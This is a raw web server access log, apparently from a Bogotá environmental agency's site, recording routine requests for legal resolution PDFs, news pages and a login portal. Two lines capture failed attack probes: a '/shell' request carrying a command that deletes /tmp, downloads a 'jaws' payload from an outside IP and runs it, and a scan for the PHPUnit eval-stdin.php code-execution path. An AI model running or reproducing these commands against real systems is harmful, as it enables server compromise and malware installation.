186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
186.155.209.11 - - [12/Mar/2022:10:38:15 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
186.155.209.11 - - [12/Mar/2022:10:38:16 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
186.155.209.11 - - [12/Mar/2022:10:38:18 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
186.155.209.11 - - [12/Mar/2022:10:38:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
186.155.209.11 - - [12/Mar/2022:10:38:28 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
186.155.209.11 - - [12/Mar/2022:10:38:29 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
186.155.209.11 - - [12/Mar/2022:10:38:30 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.155.209.11 - - [12/Mar/2022:10:38:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2F HTTP/1.1" 200 38542
186.155.209.11 - - [12/Mar/2022:10:38:33 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
186.155.209.11 - - [12/Mar/2022:10:38:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1501-1550%2F HTTP/1.1" 200 12370
186.155.209.11 - - [12/Mar/2022:10:38:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201501-1550/00001534.tif HTTP/1.1" 200 329438
191.95.55.194 - - [12/Mar/2022:10:38:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.209.11 - - [12/Mar/2022:10:38:09 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 20427
186.155.209.11 - - [12/Mar/2022:10:38:14 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 24523
216.245.221.92 - - [12/Mar/2022:10:39:17 -0500] "HEAD / HTTP/1.1" 200 -
186.86.33.174 - - [12/Mar/2022:10:40:20 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
201.245.192.253 - - [12/Mar/2022:10:40:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42802
181.50.161.1 - - [12/Mar/2022:10:42:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [12/Mar/2022:10:41:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46128
201.245.192.253 - - [12/Mar/2022:10:42:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116599
216.245.221.92 - - [12/Mar/2022:10:44:16 -0500] "HEAD / HTTP/1.1" 200 -
181.204.38.98 - - [12/Mar/2022:10:44:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.226.197 - - [12/Mar/2022:10:45:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 77771
201.245.226.197 - - [12/Mar/2022:10:45:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 319933
216.245.221.92 - - [12/Mar/2022:10:49:16 -0500] "HEAD / HTTP/1.1" 200 -
179.18.2.41 - - [12/Mar/2022:10:52:18 -0500] "-" 408 -
201.245.192.253 - - [12/Mar/2022:10:51:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116599
66.249.66.87 - - [12/Mar/2022:10:52:49 -0500] "-" 408 -
191.95.58.234 - - [12/Mar/2022:10:53:47 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html?fbclid=IwAR1IPJEBCfJQew23llIDEb6vfqLKr4MGpwOt5swdEnlh9cOE-p2aNpu2ycg HTTP/1.1" 200 1078
216.245.221.92 - - [12/Mar/2022:10:54:16 -0500] "HEAD / HTTP/1.1" 200 -
54.39.50.78 - - [12/Mar/2022:10:55:12 -0500] "GET /andrea-murcia-la-creadora-del-primer-hogar-de-paso-para-perros-y-gatos-en-un-colegio.html HTTP/1.1" 200 973
190.27.23.175 - - [12/Mar/2022:10:55:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1395.pdf HTTP/1.1" 200 339653
190.27.23.175 - - [12/Mar/2022:10:55:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0769.pdf HTTP/1.1" 200 305989
190.158.204.33 - - [12/Mar/2022:10:57:23 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
207.46.13.157 - - [12/Mar/2022:10:58:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4030.pdf HTTP/1.1" 200 351841
186.30.47.206 - - [12/Mar/2022:10:58:54 -0500] "-" 408 -
186.30.47.206 - - [12/Mar/2022:10:58:54 -0500] "-" 408 -
216.245.221.92 - - [12/Mar/2022:10:59:16 -0500] "HEAD / HTTP/1.1" 200 -
190.24.37.228 - - [12/Mar/2022:10:59:27 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
190.27.23.175 - - [12/Mar/2022:10:59:59 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.27.23.175 - - [12/Mar/2022:11:00:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339066
34.90.81.191 - - [12/Mar/2022:11:00:05 -0500] "GET / HTTP/1.1" 200 319
190.27.23.175 - - [12/Mar/2022:11:00:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339066
66.249.66.85 - - [12/Mar/2022:11:01:14 -0500] "-" 408 -
199.16.157.180 - - [12/Mar/2022:11:02:49 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
201.245.192.253 - - [12/Mar/2022:11:02:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116599
191.95.51.30 - - [12/Mar/2022:11:04:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.7.97.138 - - [12/Mar/2022:11:04:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.1 - - [12/Mar/2022:11:04:53 -0500] "GET /bla/resoluciones/resoluciones%202021/3095.pdf HTTP/1.1" 200 1169700
190.146.196.101 - - [12/Mar/2022:11:05:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.61.37 - - [12/Mar/2022:11:05:48 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html?fbclid=IwAR0tKTDLspuq8bu04JYRZIO2vHeL0VpLI7gGHOtcB4DthoXU10Ugmm1DQ2w HTTP/1.1" 200 1078
186.154.59.189 - - [12/Mar/2022:11:07:29 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
216.245.221.92 - - [12/Mar/2022:11:08:08 -0500] "HEAD / HTTP/1.1" 200 -
186.86.33.140 - - [12/Mar/2022:11:08:22 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html HTTP/1.1" 200 958
186.82.192.9 - - [12/Mar/2022:11:10:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
161.18.117.238 - - [12/Mar/2022:11:11:45 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
201.245.192.253 - - [12/Mar/2022:11:11:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
201.221.172.4 - - [12/Mar/2022:11:13:31 -0500] "GET /BLA/resoluciones/AUTOS%202013/2770.pdf HTTP/1.1" 200 1252001
157.55.39.123 - - [12/Mar/2022:11:13:36 -0500] "GET /bla/resoluciones/resoluciones%202021/4107.pdf HTTP/1.1" 200 357940
190.158.204.235 - - [12/Mar/2022:11:13:51 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
216.245.221.92 - - [12/Mar/2022:11:15:37 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.6 - - [12/Mar/2022:11:18:19 -0500] "GET /images/nueva-jornada-reciclaton-ambiente-cajas-12-noviembre.jpg HTTP/1.1" 200 479427
69.171.249.16 - - [12/Mar/2022:11:18:19 -0500] "GET /fontibon-entrego-mas-de-58-kilogramos-de-residuos-especiales-y-peligrosos-en-reciclaton.html HTTP/1.1" 206 1010
69.171.249.120 - - [12/Mar/2022:11:18:19 -0500] "GET /fontibon-entrego-mas-de-58-kilogramos-de-residuos-especiales-y-peligrosos-en-reciclaton.html HTTP/1.1" 206 1010
173.252.107.6 - - [12/Mar/2022:11:18:20 -0500] "GET /images/reciclaton-fontibon-17-febrero.jpg HTTP/1.1" 200 56077
40.77.167.1 - - [12/Mar/2022:11:19:04 -0500] "GET /bla/resoluciones/resoluciones%202021/3099.pdf HTTP/1.1" 200 780058
216.245.221.92 - - [12/Mar/2022:11:20:36 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.118 - - [12/Mar/2022:11:21:21 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html HTTP/1.1" 206 958
201.245.192.253 - - [12/Mar/2022:11:20:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42649
69.171.251.5 - - [12/Mar/2022:11:22:14 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html?fbclid=IwAR2PIVxsGdadI2YVD_5KT38APGIrz-phGiCyYUfT9YkaMm_mgT3c8U_idco HTTP/1.1" 200 958
201.245.192.253 - - [12/Mar/2022:11:21:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
201.245.192.253 - - [12/Mar/2022:11:21:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
31.13.127.29 - - [12/Mar/2022:11:23:42 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.95.3 - - [12/Mar/2022:11:23:43 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.115.17 - - [12/Mar/2022:11:23:43 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
201.221.172.4 - - [12/Mar/2022:11:25:20 -0500] "GET /BLA/resoluciones/AUTOS%202014/1264.pdf HTTP/1.1" 200 204358
201.221.172.4 - - [12/Mar/2022:11:25:23 -0500] "GET /BLA/resoluciones/AUTOS%202014/1263.pdf HTTP/1.1" 200 195131
201.221.172.4 - - [12/Mar/2022:11:25:26 -0500] "GET /BLA/resoluciones/AUTOS%202014/1201.pdf HTTP/1.1" 200 343747
197.32.80.133 - - [12/Mar/2022:11:25:30 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [12/Mar/2022:11:25:36 -0500] "HEAD / HTTP/1.1" 200 -
201.221.172.4 - - [12/Mar/2022:11:25:45 -0500] "GET /BLA/resoluciones/AUTOS%202014/0685.pdf HTTP/1.1" 200 1394035
201.221.172.4 - - [12/Mar/2022:11:26:49 -0500] "GET /BLA/resoluciones/AUTOS%202015/5824.pdf HTTP/1.1" 200 724879
201.221.172.4 - - [12/Mar/2022:11:27:04 -0500] "GET /BLA/resoluciones/AUTOS%202015/5558.pdf HTTP/1.1" 200 855558
201.221.172.4 - - [12/Mar/2022:11:27:22 -0500] "GET /BLA/resoluciones/AUTOS%202015/4393.pdf HTTP/1.1" 200 840041
201.221.172.4 - - [12/Mar/2022:11:27:37 -0500] "GET /BLA/resoluciones/AUTOS%202015/4239.pdf HTTP/1.1" 200 751137
69.171.251.15 - - [12/Mar/2022:11:27:52 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html?fbclid=IwAR2dRzzC81NAVEWP7HpUhD661rzF1wzDFARWDMmixMHL5RT1Cc-I57BBSjg HTTP/1.1" 200 1264
201.221.172.4 - - [12/Mar/2022:11:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202015/3405.pdf HTTP/1.1" 200 1099786
201.221.172.4 - - [12/Mar/2022:11:28:42 -0500] "GET /BLA/resoluciones/AUTOS%202015/3033.pdf HTTP/1.1" 200 729776
201.221.172.4 - - [12/Mar/2022:11:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202015/2345.pdf HTTP/1.1" 200 433471
201.221.172.4 - - [12/Mar/2022:11:29:21 -0500] "GET /BLA/resoluciones/AUTOS%202015/2221.pdf HTTP/1.1" 200 562065
201.221.172.4 - - [12/Mar/2022:11:29:40 -0500] "GET /BLA/resoluciones/AUTOS%202015/2054.pdf HTTP/1.1" 200 1152948
181.49.158.102 - - [12/Mar/2022:11:29:49 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
186.84.89.221 - - [12/Mar/2022:11:29:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.1 - - [12/Mar/2022:11:30:05 -0500] "GET /bla/resoluciones/resoluciones%202021/1044.pdf HTTP/1.1" 200 332979
69.171.251.25 - - [12/Mar/2022:11:30:32 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html?fbclid=IwAR36zGt6hcszYfjOkHOhvl7duwRmEpwCMqvx-l6Kp0_zPtJ5oY_AL0H160U HTTP/1.1" 200 1264
216.245.221.92 - - [12/Mar/2022:11:30:36 -0500] "HEAD / HTTP/1.1" 200 -
201.221.172.4 - - [12/Mar/2022:11:31:00 -0500] "GET /BLA/resoluciones/AUTOS%202015/1448.pdf HTTP/1.1" 200 727315
201.245.192.253 - - [12/Mar/2022:11:30:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42649
40.77.167.6 - - [12/Mar/2022:11:32:00 -0500] "GET /portaldeninos/2021/06/05/celebracion-del-dia-mundial-del-medio-ambiente-comenzo-desde-uno-de-los-pulmones-de-bogota/ HTTP/1.1" 200 97179
201.245.192.253 - - [12/Mar/2022:11:31:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
201.245.192.253 - - [12/Mar/2022:11:31:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
66.249.66.87 - - [12/Mar/2022:11:34:09 -0500] "-" 408 -
74.125.210.57 - - [12/Mar/2022:11:35:14 -0500] "GET /reportes_sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 26872
216.245.221.92 - - [12/Mar/2022:11:35:23 -0500] "HEAD / HTTP/1.1" 200 -
191.95.55.37 - - [12/Mar/2022:11:35:40 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.61.60 - - [12/Mar/2022:11:35:59 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 304 -
216.245.221.92 - - [12/Mar/2022:11:40:22 -0500] "HEAD / HTTP/1.1" 200 -
201.221.172.4 - - [12/Mar/2022:11:40:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/03667.pdf HTTP/1.1" 404 1120
201.221.172.4 - - [12/Mar/2022:11:40:30 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.221.172.4 - - [12/Mar/2022:11:41:03 -0500] "GET /BLA/resoluciones/AUTOS%202019/4867.pdf HTTP/1.1" 200 324543
181.51.104.58 - - [12/Mar/2022:11:41:31 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.51.104.58 - - [12/Mar/2022:11:41:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [12/Mar/2022:11:40:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42649
201.221.172.4 - - [12/Mar/2022:11:41:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/4479.pdf HTTP/1.1" 200 286807
173.252.87.24 - - [12/Mar/2022:11:42:05 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 206 1264
173.252.87.117 - - [12/Mar/2022:11:42:05 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 206 1264
173.252.87.117 - - [12/Mar/2022:11:42:06 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 206 1264
201.221.172.4 - - [12/Mar/2022:11:42:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/4477.pdf HTTP/1.1" 200 471233
186.155.19.27 - - [12/Mar/2022:11:42:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [12/Mar/2022:11:41:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
201.221.172.4 - - [12/Mar/2022:11:42:39 -0500] "GET /BLA/resoluciones/AUTOS%202019/3045.pdf HTTP/1.1" 200 524637
201.245.192.253 - - [12/Mar/2022:11:42:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
181.51.104.58 - - [12/Mar/2022:11:43:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2016%2F HTTP/1.1" 200 162974
181.51.104.58 - - [12/Mar/2022:11:43:32 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
42.240.132.29 - - [12/Mar/2022:11:45:13 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [12/Mar/2022:11:45:22 -0500] "HEAD / HTTP/1.1" 200 -
181.53.12.75 - - [12/Mar/2022:11:46:14 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
201.221.172.4 - - [12/Mar/2022:11:47:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/4853.pdf HTTP/1.1" 200 404554
201.221.172.4 - - [12/Mar/2022:11:47:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/4670.pdf HTTP/1.1" 200 381293
201.221.172.4 - - [12/Mar/2022:11:47:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/4668.pdf HTTP/1.1" 200 411850
201.221.172.4 - - [12/Mar/2022:11:48:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/4657.pdf HTTP/1.1" 200 572406
157.55.39.123 - - [12/Mar/2022:11:48:29 -0500] "GET /bla/resoluciones/resoluciones%202021/1197.pdf HTTP/1.1" 200 454063
157.55.39.214 - - [12/Mar/2022:11:48:58 -0500] "GET /bla/resoluciones/resoluciones%202021/0241.pdf HTTP/1.1" 200 394436
201.221.172.4 - - [12/Mar/2022:11:49:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/2899.pdf HTTP/1.1" 200 480000
45.146.165.37 - - [12/Mar/2022:11:50:22 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
216.245.221.92 - - [12/Mar/2022:11:50:22 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.4 - - [12/Mar/2022:11:50:30 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.127.30 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.127.3 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.95.1 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.79.21 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.127.41 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
66.220.149.16 - - [12/Mar/2022:11:50:31 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.103.2 - - [12/Mar/2022:11:50:32 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
181.51.32.100 - - [12/Mar/2022:11:50:52 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
168.197.68.36 - - [12/Mar/2022:11:51:12 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
168.197.68.36 - - [12/Mar/2022:11:51:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
168.197.68.36 - - [12/Mar/2022:11:51:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [12/Mar/2022:11:51:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
66.249.66.87 - - [12/Mar/2022:11:52:59 -0500] "-" 408 -
181.78.24.210 - - [12/Mar/2022:11:54:48 -0500] "GET /asi-es-el-tramite-para-obtener-el-certificado-de-conservacion-ambiental-2022.html HTTP/1.1" 200 935
216.245.221.92 - - [12/Mar/2022:11:55:22 -0500] "HEAD / HTTP/1.1" 200 -
191.95.60.165 - - [12/Mar/2022:11:55:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.60.165 - - [12/Mar/2022:11:55:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.60.165 - - [12/Mar/2022:11:55:44 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.62.149.79 - - [12/Mar/2022:11:56:08 -0500] "GET /sipse/faces/faces/index.xhtml%C3%87 HTTP/1.1" 302 -
181.62.149.79 - - [12/Mar/2022:11:56:08 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12171
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
